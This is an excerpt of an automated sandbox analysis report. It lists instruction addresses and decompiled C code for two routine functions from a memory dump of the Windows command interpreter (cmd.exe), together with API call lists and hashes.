                                    0x011dc30b
                                    0x011dc311
                                    0x011dc314
                                    0x011dc31b
                                    0x011dc324
                                    0x011dc325
                                    0x011dc325
                                    0x011dc328
                                    0x011ea8c7
                                    0x011ea8cc
                                    0x011ea8ce
                                    0x011ea8cf
                                    0x011ea8d4
                                    0x011ea8db
                                    0x011ea8e1
                                    0x00000000
                                    0x011dc32e
                                    0x011dc32f
                                    0x011dc32f
                                    0x011dc332
                                    0x011ea7f0
                                    0x011ea7f4
                                    0x011ea829
                                    0x011ea831
                                    0x011ea836
                                    0x011ea838
                                    0x00000000
                                    0x011ea83e
                                    0x011ea83e
                                    0x011ea842
                                    0x011ea848
                                    0x011ea848
                                    0x00000000
                                    0x011ea842
                                    0x011ea7f6
                                    0x011ea7f6
                                    0x011ea7f9
                                    0x011ea7fc
                                    0x011ea7fc
                                    0x011ea7ff
                                    0x011ea802
                                    0x011ea802
                                    0x011ea80a
                                    0x011ea80c
                                    0x011ea80f
                                    0x00000000
                                    0x011ea815
                                    0x011ea817
                                    0x011ea81e
                                    0x00000000
                                    0x011ea81e
                                    0x011ea80f
                                    0x011dc338
                                    0x011dc338
                                    0x011dc338
                                    0x011dc33b
                                    0x011dc362
                                    0x011dc366
                                    0x011dc368
                                    0x011ea7e6
                                    0x011dc36e
                                    0x011dc36e
                                    0x011dc36e
                                    0x011dc36e
                                    0x00000000
                                    0x011dc33d
                                    0x011dc33d
                                    0x011dc33d
                                    0x011dc340
                                    0x011ea7ca
                                    0x011ea7ce
                                    0x011ea7d0
                                    0x011ea7dc
                                    0x011ea7d2
                                    0x011ea7d2
                                    0x011ea7d2
                                    0x00000000
                                    0x011dc346
                                    0x011dc346
                                    0x011dc346
                                    0x011dc349
                                    0x011dc3dc
                                    0x011dc3df
                                    0x011ea886
                                    0x011ea887
                                    0x011ea88f
                                    0x011ea895
                                    0x011ea8a2
                                    0x011ea8a3
                                    0x011ea8a5
                                    0x00000000
                                    0x011dc3e5
                                    0x011dc3e5
                                    0x011dc3e9
                                    0x011dc3eb
                                    0x011dc403
                                    0x011dc3ed
                                    0x011dc3ed
                                    0x011dc3ed
                                    0x011dc3ed
                                    0x011dc3f0
                                    0x011dc3f4
                                    0x011dc3f7
                                    0x011dc3fc
                                    0x00000000
                                    0x011dc3fe
                                    0x011ea87b
                                    0x011ea87e
                                    0x011ea881
                                    0x00000000
                                    0x011ea881
                                    0x011dc3fc
                                    0x011dc34f
                                    0x011dc34f
                                    0x011dc353
                                    0x011dc355
                                    0x011ea7c0
                                    0x011dc35b
                                    0x011dc35b
                                    0x011dc35b
                                    0x011dc373
                                    0x011dc373
                                    0x011dc375
                                    0x011dc377
                                    0x011dc37a
                                    0x011dc37f
                                    0x011ea8ac
                                    0x011ea8af
                                    0x011ea8af
                                    0x011ea8b5
                                    0x011ea8b6
                                    0x011ea8b6
                                    0x011ea8b8
                                    0x011ea8bd
                                    0x011ea8bd
                                    0x011ea8e7
                                    0x011ea8e9
                                    0x011dc3ca
                                    0x011dc3cd
                                    0x011dc3ce
                                    0x011dc3cf
                                    0x011dc3d1
                                    0x011dc3da
                                    0x011dc385
                                    0x011dc385
                                    0x011dc385
                                    0x011dc388
                                    0x011dc38b
                                    0x011dc392
                                    0x011dc394
                                    0x011dc397
                                    0x011dc39a
                                    0x00000000
                                    0x011dc39c
                                    0x011dc39c
                                    0x00000000
                                    0x011dc39c
                                    0x011dc39a
                                    0x011dc37f
                                    0x011dc349
                                    0x011dc340
                                    0x011dc33b
                                    0x011dc332
                                    0x00000000
                                    0x011dc3a3
                                    0x011dc3a3
                                    0x011dc3a6
                                    0x011dc3a8
                                    0x011ea855
                                    0x011ea856
                                    0x011ea85b
                                    0x011ea85d
                                    0x011ea8ef
                                    0x011ea8fb
                                    0x011ea901
                                    0x011ea902
                                    0x011dc471
                                    0x011dc473
                                    0x011dc473
                                    0x011dc476
                                    0x011dc479
                                    0x011dc479
                                    0x011dc486
                                    0x011dc496
                                    0x011dc498
                                    0x011dc49a
                                    0x011ea91a
                                    0x011ea91c
                                    0x011dc4a0
                                    0x011dc4b3
                                    0x011dc4b5
                                    0x011dc4b7
                                    0x011dc4b9
                                    0x00000000
                                    0x011dc4bf
                                    0x011dc4bf
                                    0x011dc4c4
                                    0x011dc4c6
                                    0x011ea922
                                    0x011ea922
                                    0x011dc4cf
                                    0x011dc4d4
                                    0x011dc4d9
                                    0x011dc4dc
                                    0x011dc4de
                                    0x00000000
                                    0x011dc4e4
                                    0x011dc4e4
                                    0x011dc4ef
                                    0x011dc4f7
                                    0x011dc4fd
                                    0x011dc504
                                    0x011dc509
                                    0x011dc50c
                                    0x011dc50f
                                    0x011dc512
                                    0x011dc514
                                    0x011dc514
                                    0x011dc527
                                    0x011dc529
                                    0x011dc52b
                                    0x011dc56c
                                    0x011dc56c
                                    0x011dc56f
                                    0x00000000
                                    0x00000000
                                    0x011dc577
                                    0x011dc57f
                                    0x011dc581
                                    0x011dc538
                                    0x011dc540
                                    0x011dc542
                                    0x011dc59b
                                    0x00000000
                                    0x011dc544
                                    0x011dc54a
                                    0x011dc552
                                    0x011dc554
                                    0x011ea932
                                    0x011ea939
                                    0x011ea93a
                                    0x011ea93c
                                    0x011ea94a
                                    0x011ea94d
                                    0x00000000
                                    0x011ea953
                                    0x011ea953
                                    0x011ea954
                                    0x011ea959
                                    0x011ea961
                                    0x011ea963
                                    0x011ea963
                                    0x011ea93e
                                    0x011ea93e
                                    0x00000000
                                    0x011ea93e
                                    0x011dc55a
                                    0x011dc55a
                                    0x00000000
                                    0x011dc55a
                                    0x011dc554
                                    0x011dc583
                                    0x011dc583
                                    0x011dc561
                                    0x011dc568
                                    0x011dc56a
                                    0x011dc56a
                                    0x00000000
                                    0x011dc56a
                                    0x00000000
                                    0x011dc581
                                    0x011dc58c
                                    0x011dc58c
                                    0x011dc58c
                                    0x011dc4de
                                    0x011dc4b9
                                    0x011dc58e
                                    0x011dc596
                                    0x011ea863
                                    0x011ea863
                                    0x011ea868
                                    0x011ea86a
                                    0x011ea86d
                                    0x011ea870
                                    0x00000000
                                    0x011ea870
                                    0x011dc3ae
                                    0x011dc3ae
                                    0x011dc3b1
                                    0x011dc3c0
                                    0x011dc3c2
                                    0x00000000
                                    0x011dc3c2
                                    0x00000000
                                    0x011dc3a8
                                    0x011dc2e7
                                    0x011d5f23
                                    0x011d5f24
                                    0x011d5f31
                                    0x011d5f31
                                    0x011d5ec9
                                    0x011d5ecb
                                    0x011d5ecc
                                    0x011d5ecc
                                    0x011d5ed2
                                    0x00000000
                                    0x00000000
                                    0x011d5eda
                                    0x011d5edd
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d5edd
                                    0x00000000
                                    0x011d5ecc
                                    0x011d5ec7
                                    0x011d5eb5
                                    0x011d5ea0
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmpswscanf
                                    • String ID: :EOF
                                    • API String ID: 1534968528-551370653
                                    • Opcode ID: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                    • Instruction ID: 9a743848c4572d711767abbe370205ac22ef8f816b3b7dd5a999dc47071e0d55
                                    • Opcode Fuzzy Hash: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                    • Instruction Fuzzy Hash: 35A10330A046169BEB2DDFACD4487BABBF5FF04314F14441EE942D7281EB759A41C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D58A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E011D58A4() {
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				intOrPtr _t29;
				long _t40;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				void* _t67;

				_t44 = _t67;
				_push(_t45);
				_push(_t45);
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_t22 =  *0x1218064 & 0x000000ff;
				_v24 = _t45;
				_push(0);
				_push(0x120b8f8);
				_v16 = 0;
				_v20 = 0xc0000001;
				 *0x11fd560 = _t22;
				L011E82C1();
				if(_t22 != 0) {
					_t60 = 1;
					_v16 = 1;
				} else {
					_t48 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t48 = 0x1213ab0;
					}
					_t51 =  *0x1213cc0;
					E011E36CB(_t44, _t48,  *0x1213cc0, 0);
					 *0x11fd56c = 0;
					 *0x11fd5ac = 0;
					 *0x11fd564 = 1;
					 *0x11fd55c = 1;
					 *0x11fd0c0 = 1;
					_t29 =  *0x11fd5dc; // 0x0
					_t49 = 0x24;
					 *0x11fd5a8 = 0;
					 *0x11fd5a4 = 0;
					 *0x11fd568 = _t29;
					_t62 = E011E00B0(_t49);
					if(_t62 == 0) {
						L14:
						E011F9287(_t49);
						__imp__longjmp(0x120b8b8, 1);
						goto L15;
					} else {
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
						_t49 = 0x24;
						_v36 = _t62;
						 *((intOrPtr*)(_t62 + 0x20)) = 0;
						_t57 = E011E00B0(_t49);
						if(_t57 == 0) {
							goto L14;
						} else {
							 *_t57 = 0;
							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
							_v40 = _t57;
							 *((intOrPtr*)(_t57 + 0x20)) = 0;
							E011D450B(_v24, _t62, _t57);
							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
							_v20 = _t40;
							if(_t40 >= 0) {
								_v28 = 2;
								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
							}
							_t51 = _t57;
							_t49 = _t62;
							if( *0x11fd55c == 4) {
								L15:
								E011F8664(_t49, _t51);
								_t60 = _v16;
							} else {
								_t60 = E011D48E6(_t49, _t51);
								_v16 = _t60;
							}
						}
					}
					E011E274C(0x1213d00, 0x104, L"%9d",  *0x11fd56c);
					E011DC108(_t49, 0x2336, 1, 0x1213d00);
					 *0x11fd560 =  *0x1218064 & 0x000000ff;
				}
				if(_v20 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
				}
				return _t60;
			}






















                                    0x011d58a7
                                    0x011d58a9
                                    0x011d58aa
                                    0x011d58b5
                                    0x011d58be
                                    0x011d58c9
                                    0x011d58cc
                                    0x011d58cd
                                    0x011d58d2
                                    0x011d58d5
                                    0x011d58dc
                                    0x011d58e1
                                    0x011d58ea
                                    0x011e97fc
                                    0x011e97fd
                                    0x011d58f0
                                    0x011d58f0
                                    0x011d58f8
                                    0x011e9805
                                    0x011e9805
                                    0x011d58fe
                                    0x011d5905
                                    0x011d590c
                                    0x011d5913
                                    0x011d591b
                                    0x011d5920
                                    0x011d5925
                                    0x011d592a
                                    0x011d592f
                                    0x011d5930
                                    0x011d5936
                                    0x011d593c
                                    0x011d5946
                                    0x011d594a
                                    0x011e980f
                                    0x011e980f
                                    0x011e981b
                                    0x00000000
                                    0x011d5950
                                    0x011d5950
                                    0x011d5954
                                    0x011d5957
                                    0x011d5958
                                    0x011d595b
                                    0x011d5963
                                    0x011d5967
                                    0x00000000
                                    0x011d596d
                                    0x011d5972
                                    0x011d5976
                                    0x011d597a
                                    0x011d597d
                                    0x011d5980
                                    0x011d5991
                                    0x011d5997
                                    0x011d599c
                                    0x011d59a3
                                    0x011d59af
                                    0x011d59af
                                    0x011d59bc
                                    0x011d59be
                                    0x011d59c0
                                    0x011e9821
                                    0x011e9821
                                    0x011e9826
                                    0x011d59c6
                                    0x011d59cb
                                    0x011d59cd
                                    0x011d59cd
                                    0x011d59c0
                                    0x011d5967
                                    0x011d59e6
                                    0x011d59f3
                                    0x011d5a02
                                    0x011d5a02
                                    0x011d5a0b
                                    0x011d5a17
                                    0x011d5a17
                                    0x011d5a27

                                    APIs
                                    • _setjmp3.MSVCRT ref: 011D58E1
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 011D5991
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D59AF
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D5A17
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011E981B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                    • String ID: %9d
                                    • API String ID: 4212706909-2241623522
                                    • Opcode ID: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                    • Instruction ID: 076ada4763b7f5cd79016c0bda98e2724dde123a8b3f8abc480590b9f25c1222
                                    • Opcode Fuzzy Hash: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                    • Instruction Fuzzy Hash: B741C5B0D00315EFDB28DFA9A849A6ABFF4FB54728F10422EE624D7294DB704540CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5226, Relevance: 9.5, APIs: 6, Instructions: 458COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E011D5226(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				LPWSTR* _v36;
				void _v556;
				signed int _v560;
				signed short** _v564;
				WCHAR* _v568;
				LPWSTR* _v572;
				intOrPtr _v576;
				LPWSTR* _v580;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed short** _t160;
				intOrPtr _t164;
				LPWSTR* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				signed int _t176;
				void* _t179;
				signed short** _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				signed int _t194;
				void* _t195;
				signed short _t197;
				intOrPtr _t199;
				void* _t205;
				void* _t207;
				void* _t209;
				signed short _t211;
				void* _t213;
				WCHAR* _t222;
				signed short* _t225;
				intOrPtr* _t226;
				void* _t228;
				intOrPtr _t230;
				signed short* _t235;
				signed int _t236;
				intOrPtr* _t244;
				short* _t247;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t256;
				intOrPtr* _t259;
				void* _t262;
				intOrPtr* _t263;
				signed short* _t266;
				signed short* _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t276;
				signed short* _t280;
				void* _t288;
				signed short* _t289;
				void* _t292;
				short* _t293;
				void* _t297;
				short _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				signed int _t306;
				signed short* _t307;
				void* _t314;
				intOrPtr* _t316;
				intOrPtr* _t322;
				LPWSTR* _t324;
				void* _t325;
				void* _t326;
				WCHAR* _t327;
				void* _t328;
				void* _t331;
				intOrPtr _t333;
				void* _t334;
				intOrPtr _t336;
				intOrPtr* _t340;
				intOrPtr* _t341;
				short* _t344;
				void* _t346;
				intOrPtr* _t347;
				signed int _t349;
				intOrPtr _t353;
				intOrPtr _t357;
				signed int _t363;

				_t295 = __edx;
				_t236 = _t363;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t236 + 4));
				_t361 = (_t363 & 0xfffffff8) + 4;
				_t146 =  *0x11fd0b4; // 0x2833377e
				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
				_t322 =  *((intOrPtr*)(_t236 + 8));
				_t333 = __ecx;
				_v28 = 0x104;
				_v584 = __edx;
				_v576 = __ecx;
				_v568 = _t322;
				_v572 = 0;
				_v580 = 0;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t324 = 1;
					L25:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t325);
					_pop(_t334);
					return E011E6FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
				}
				_t160 =  *(_v584 + 0x20);
				_v564 = _t160;
				if(_t160 == 0) {
					_t161 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t161 = 0x1213ab0;
					}
					E011E1040(_t322,  *(_t236 + 0xc), _t161);
					_t244 = _t322;
					_v572 = 0;
					_t326 = 2;
					_t297 = _t244 + 2;
					do {
						_t164 =  *_t244;
						_t244 = _t244 + _t326;
					} while (_t164 != 0);
					_t165 = _v568;
					_t336 = _v576;
					_t298 = 0x5c;
					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
					if(_t165 >= _t247) {
						L38:
						 *_t247 = _t298;
						 *((short*)(_t247 + 2)) = 0;
						L39:
						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
							L54:
							_t299 = _v568;
							_t248 = _t299 + 2;
							do {
								_t167 =  *_t299;
								_t299 = _t299 + _t326;
							} while (_t167 != 0);
							_v572 = _t299 - _t248 >> 1;
							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_t295 = 0;
							_t249 = _t340;
							_v560 = _t249 + 2;
							do {
								_t169 =  *_t249;
								_t249 = _t249 + _t326;
							} while (_t169 != 0);
							_t327 = _v568;
							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
								L53:
								_t341 = _v564;
								L89:
								_v580 = 1;
								L20:
								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
									L24:
									_t324 = _v580;
									goto L25;
								}
								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
										goto L90;
									}
								} else {
									L90:
									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t328 != 0xffffffff) {
										_t176 = GetFileType(_t328);
										CloseHandle(_t328);
										if((_t176 & 0xffff7fff) == 1) {
											_t344 = _v568;
											_t295 = 0x400023d3;
											_t179 = E011F9583(_t344, 0x400023d3, 0x400023d4);
											if(_t179 == 0) {
												 *_t344 = 0;
											} else {
												if(_t179 == 0) {
													_t183 = _v564;
													if(_t183 == 0) {
														_t183 = _v584;
													}
													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L24;
							}
							_push(_t340);
							L80:
							_t295 =  *(_t236 + 0xc);
							E011E18C0(_t327,  *(_t236 + 0xc));
							_t341 = _v564;
							goto L20;
						}
						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
						_t256 = _t303;
						_v572 = _t303;
						_v560 = _t256 + 2;
						do {
							_t186 =  *_t256;
							_t256 = _t256 + _t326;
						} while (_t186 != 0);
						if(_t256 == _v560) {
							goto L54;
						}
						_t259 = _t303;
						_t295 = 0;
						_t346 = _t259 + 2;
						do {
							_t187 =  *_t259;
							_t259 = _t259 + _t326;
						} while (_t187 != 0);
						if(_t259 == _t346) {
							L52:
							_t327 = _v568;
							goto L53;
						}
						_t347 = _v568;
						_t262 = _t347 + 2;
						do {
							_t188 =  *_t347;
							_t347 = _t347 + _t326;
						} while (_t188 != 0);
						_t263 = _v572;
						_t349 = _t347 - _t262 >> 1;
						_t72 = _t263 + 2; // 0x2
						_v560 = _t72;
						do {
							_t190 =  *_t263;
							_t263 = _t263 + _t326;
						} while (_t190 != 0);
						_t295 = _v572;
						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						_push(_t295);
						goto L80;
					} else {
						goto L33;
					}
					do {
						L33:
						if( *_t165 == _t298) {
							_v572 = _t165;
						}
						_t165 = _t165 + _t326;
					} while (_t165 < _t247);
					if(_v572 == 0 || _v572 < _t247 - 2) {
						goto L38;
					} else {
						goto L39;
					}
				}
				_t266 =  *_t160;
				_t331 = 2;
				_t194 =  *_t266 & 0x0000ffff;
				_t306 = _t194;
				_v560 = _t306;
				if(_t194 == 0) {
					L6:
					_t195 = 0x3a;
					if(_t306 == _t195) {
						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
							L73:
							_t307 =  *_v564;
							_t267 =  &(_t307[1]);
							do {
								_t197 =  *_t307;
								_t307 = _t307 + _t331;
							} while (_t197 != 0);
							_t295 = _t307 - _t267 >> 1;
							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_v560 = _t269 + 2;
							do {
								_t199 =  *_t269;
								_t269 = _t269 + _t331;
							} while (_t199 != 0);
							_t353 = _v576;
							_t327 = _v568;
							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
								goto L53;
							}
							E011E1040(_t327,  *(_t236 + 0xc),  *_v564);
							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
							L79:
							_push(_t205);
							goto L80;
						}
						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
						_t273 = _t295;
						_v560 = _t273 + 2;
						do {
							_t207 =  *_t273;
							_t273 = _t273 + _t331;
						} while (_t207 != 0);
						if(_t273 == _v560) {
							goto L73;
						}
						_t276 = _t295;
						_v560 = _t276 + 2;
						do {
							_t209 =  *_t276;
							_t276 = _t276 + _t331;
						} while (_t209 != 0);
						if(_t276 == _v560) {
							goto L52;
						}
						_t280 =  *_v564;
						_v560 =  &(_t280[1]);
						do {
							_t211 =  *_t280;
							_t280 = _t280 + _t331;
						} while (_t211 != 0);
						_t357 = _v576;
						_v572 = _t280 - _v560 >> 1;
						_v560 = _t295 + 2;
						do {
							_t213 =  *_t295;
							_t295 = _t295 + _t331;
						} while (_t213 != 0);
						if( &(_v572[0]) + _t295 > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						E011E1040(_t327,  *(_t236 + 0xc),  *_v564);
						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
						goto L79;
					}
					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
						L17:
						_t341 = _v564;
						_t327 = _v568;
						_t295 =  *(_t236 + 0xc);
						if(E011D5400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
							E011F985A(_t220);
							_v580 = 1;
						}
						_t222 = _v36;
						if(_t222 == 0) {
							_t222 =  &_v556;
						}
						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
							_t288 = 0x6f;
							E011F985A(_t288);
							goto L89;
						} else {
							goto L20;
						}
					}
					_t313 = _v564;
					_t225 =  *_v564;
					_t289 = _t225;
					if(_v560 == 0) {
						L12:
						if( *_t289 != 0x2a) {
							goto L17;
						}
						_t226 = E011D5846( *_t313);
						_t314 = 0x5c;
						if( *_t226 != _t314) {
							goto L17;
						}
						_t292 = E011E2349( *((intOrPtr*)(_t333 + 4)), _t314);
						if(_t292 == 0) {
							_t293 =  *((intOrPtr*)(_t333 + 4));
							_t228 = 0x3a;
							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
								_t293 = _t293 + 4;
							}
						} else {
							_t293 = _t292 + _t331;
						}
						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
							_v560 = _t316 + 2;
							do {
								_t230 =  *_t316;
								_t316 = _t316 + _t331;
							} while (_t230 != _v572);
							if(_t316 != _v560) {
								 *_t293 = 0;
								E011E18C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
							}
						}
						goto L17;
					} else {
						goto L10;
						L10:
						_t289 = _t225;
						_t225 = _t225 + _t331;
						if( *_t225 != 0) {
							goto L10;
						} else {
							_t333 = _v576;
							goto L12;
						}
					}
				} else {
					goto L4;
					L4:
					_t235 = _t266;
					_t266 = _t266 + _t331;
					if( *_t266 != 0) {
						goto L4;
					} else {
						_t306 =  *_t235 & 0x0000ffff;
						goto L6;
					}
				}
			}





























































































                                    0x011d5226
                                    0x011d5229
                                    0x011d522b
                                    0x011d522c
                                    0x011d5237
                                    0x011d523b
                                    0x011d5243
                                    0x011d524a
                                    0x011d524f
                                    0x011d5257
                                    0x011d5259
                                    0x011d525e
                                    0x011d526c
                                    0x011d5273
                                    0x011d5279
                                    0x011d527f
                                    0x011d5285
                                    0x011d5288
                                    0x011d528c
                                    0x011d52b5
                                    0x011d53f5
                                    0x011d53d2
                                    0x011d53d5
                                    0x011d53e1
                                    0x011d53e4
                                    0x011d53f0
                                    0x011d53f0
                                    0x011d52c1
                                    0x011d52c4
                                    0x011d52cc
                                    0x011e915f
                                    0x011e9166
                                    0x011e9168
                                    0x011e9168
                                    0x011e9173
                                    0x011e9178
                                    0x011e917e
                                    0x011e9186
                                    0x011e9187
                                    0x011e918a
                                    0x011e918a
                                    0x011e918d
                                    0x011e918f
                                    0x011e9194
                                    0x011e919c
                                    0x011e91a6
                                    0x011e91a7
                                    0x011e91ac
                                    0x011e91d3
                                    0x011e91d5
                                    0x011e91d8
                                    0x011e91dc
                                    0x011e91e3
                                    0x011e929f
                                    0x011e929f
                                    0x011e92a7
                                    0x011e92aa
                                    0x011e92aa
                                    0x011e92ad
                                    0x011e92af
                                    0x011e92be
                                    0x011e92c7
                                    0x011e92ca
                                    0x011e92cc
                                    0x011e92d1
                                    0x011e92d7
                                    0x011e92d7
                                    0x011e92da
                                    0x011e92dc
                                    0x011e92ed
                                    0x011e92fd
                                    0x011e9294
                                    0x011e9294
                                    0x011e94f9
                                    0x011e94f9
                                    0x011d53a5
                                    0x011d53a9
                                    0x011d53cc
                                    0x011d53cc
                                    0x00000000
                                    0x011d53cc
                                    0x011d53b2
                                    0x011d53c6
                                    0x00000000
                                    0x00000000
                                    0x011e9508
                                    0x011e9508
                                    0x011e9521
                                    0x011e9526
                                    0x011e952d
                                    0x011e953c
                                    0x011e9547
                                    0x011e954d
                                    0x011e9553
                                    0x011e9566
                                    0x011e9568
                                    0x011e9591
                                    0x011e956a
                                    0x011e956d
                                    0x011e9573
                                    0x011e957b
                                    0x011e957d
                                    0x011e957d
                                    0x011e9583
                                    0x011e9583
                                    0x011e956d
                                    0x011e9568
                                    0x011e9547
                                    0x011e9526
                                    0x00000000
                                    0x011d53b2
                                    0x011e92ff
                                    0x011e9462
                                    0x011e9462
                                    0x011e9467
                                    0x011e946c
                                    0x00000000
                                    0x011e946c
                                    0x011e91ec
                                    0x011e91f4
                                    0x011e91f6
                                    0x011e91ff
                                    0x011e9205
                                    0x011e9205
                                    0x011e9208
                                    0x011e920a
                                    0x011e9217
                                    0x00000000
                                    0x00000000
                                    0x011e921d
                                    0x011e921f
                                    0x011e9221
                                    0x011e9224
                                    0x011e9224
                                    0x011e9227
                                    0x011e9229
                                    0x011e9232
                                    0x011e928e
                                    0x011e928e
                                    0x00000000
                                    0x011e928e
                                    0x011e9234
                                    0x011e923c
                                    0x011e923f
                                    0x011e923f
                                    0x011e9242
                                    0x011e9244
                                    0x011e924b
                                    0x011e9251
                                    0x011e9255
                                    0x011e9258
                                    0x011e925e
                                    0x011e925e
                                    0x011e9261
                                    0x011e9263
                                    0x011e9271
                                    0x011e9280
                                    0x00000000
                                    0x00000000
                                    0x011e9282
                                    0x011e9288
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e91ae
                                    0x011e91ae
                                    0x011e91b1
                                    0x011e91b3
                                    0x011e91b3
                                    0x011e91b9
                                    0x011e91bb
                                    0x011e91c6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e91c6
                                    0x011d52d2
                                    0x011d52d6
                                    0x011d52d7
                                    0x011d52da
                                    0x011d52dc
                                    0x011d52e5
                                    0x011d52f5
                                    0x011d52f7
                                    0x011d52fb
                                    0x011e930c
                                    0x011e93e9
                                    0x011e93f1
                                    0x011e93f3
                                    0x011e93f6
                                    0x011e93f6
                                    0x011e93f9
                                    0x011e93fb
                                    0x011e9408
                                    0x011e940d
                                    0x011e9415
                                    0x011e941b
                                    0x011e941b
                                    0x011e941e
                                    0x011e9420
                                    0x011e942e
                                    0x011e9434
                                    0x011e9443
                                    0x00000000
                                    0x00000000
                                    0x011e9456
